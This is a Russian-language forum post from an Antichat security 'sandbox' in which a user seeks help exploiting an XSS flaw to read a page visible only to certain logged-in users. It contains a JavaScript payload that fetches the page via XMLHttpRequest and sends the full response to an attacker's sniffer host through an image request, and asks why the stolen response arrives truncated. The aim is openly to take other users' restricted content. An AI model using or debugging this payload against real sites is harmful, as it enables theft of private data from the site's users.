HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу XSS , скачать документ, или страницу.
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #1  
Старый 20.04.2016, 11:53
sergei_petrovish
Guest
Сообщений: n/a
Провел на форуме:
11346

Репутация: 1
По умолчанию
Есть сайт с xss , и там есть страница с интересным мне контентом. Она видна только конкретным пользователям. Подскажите как можно эту страницу увидеть "глазами пользователя" или скачать. Куки достать там не получится , они с флагом. Адрес страницы такого типа site.com/wow.php . На форуме находил варианты скриптов , но они не работают Этот скрипт должен отправить весь ответ , но не срабатывает.

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]var[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]XMLHttpRequest[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]open[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'GET'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'//site/phpinfo.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]send[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]onreadystatechange[/COLOR][COLOR="#007700"]= function() {
 if ([/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]readyState[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]) {
 if([/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]status[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]200[/COLOR][COLOR="#007700"]) {
 (new[/COLOR][COLOR="#0000BB"]Image[/COLOR][COLOR="#007700"]()).[/COLOR][COLOR="#0000BB"]src[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"//%сниффер%/?"[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]responseText
[/COLOR][COLOR="#007700"]}
 }
}

[/COLOR][/COLOR
ДУмал что проблемма в снифере , но перепробовав огромное количество , поучаю тот же результат .Пару раз получил обрезанный сильно ответ . Может нужно по особенному настроить снифер ?.
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ